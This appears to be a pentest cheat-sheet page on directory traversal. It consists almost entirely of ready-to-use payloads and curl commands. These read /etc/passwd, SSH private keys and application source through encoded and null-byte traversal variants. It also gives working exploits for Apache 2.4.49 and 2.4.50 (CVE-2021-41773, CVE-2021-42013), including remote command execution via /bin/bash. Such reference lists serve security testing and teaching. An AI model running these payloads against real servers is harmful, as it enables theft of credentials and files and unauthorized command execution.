Directory (Path) Traversal

Directory traversal attack exploits an application to gain unauthorized access to the file system.

/?file=index.php
/?file=index.html
/?file=/etc/passwd
/?file=../../../etc/passwd
/?file=../../../../etc/passwd
/?file=../../../../../etc/passwd
/?file=..//..//..//..//etc/passwd
/?file=....//....//....//etc/passwd
/?file=....//....//....//....//etc/passwd
# URL encode
/?file=..%252f..%252f..%252fetc/passwd
/?file=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
# URL double encode
/?file=%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252Fetc%252Fpasswd
/?file=/var/www/images/../../../etc/passwd
/?file=/etc/passwd%00.png
/?file=../../../etc/passwd%00.png
/?file=....//....//....//etc/passwd%00.png
/?file=..%252f..%252f..%252fetc/passwd%00.png
/?file=/var/www/images/../../../etc/passwd%00.png

# Hostfile
/?file=/etc/hosts

# SSH keys
/?file=../../../../../home/<username>/.ssh/authorized_keys
/?file=../../../../../home/<username>/.ssh/id_rsa

# Web root in the developer's home
/?file=../../../../home/<username>/app/app.py

# PHP web application
/index.php/../
/index.php/..;/
/index.php/%2e%2e;/

# Windows
/?file=..\..\..\windows\win.ini

Using Curl

If we want to test against the URL path not param, curl can be used with the option --path-as-is:

curl --path-as-is http://example.com/../../../../etc/passwd

Apache 2.4.49 (CVE-2021-41773)

# without CGI enabled
curl -v 'https://example.com/cgi-bin/../../../../../../../../../../etc/passwd'
curl -v 'https://example.com/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd'
curl -v 'https://example.com/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'

# with CGI enabled
curl -v 'http://example.com/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash' -d 'echo Content-Type: text/plain; echo; cat /etc/passwd' -H "Content-Type: text/plain"

Apache 2.4.50 (CVE-2021-42013)

# without CGI enabled
curl -v 'https://example.com/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'

# with CGI enabled
curl -v 'https://example.com/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash' -d 'echo Content-Type: text/plain; echo; cat /etc/passwd' -H "Content-Type: text/plain"

References

PreviousClient-Side JavaScript Validation Bypass NextCode Deobfuscation

Last updated 1 month ago

hashtagUsing Curl

hashtagApache 2.4.49 (CVE-2021-41773)

hashtagApache 2.4.50 (CVE-2021-42013)

hashtagReferences

Using Curl

Apache 2.4.49 (CVE-2021-41773)

Apache 2.4.50 (CVE-2021-42013)

References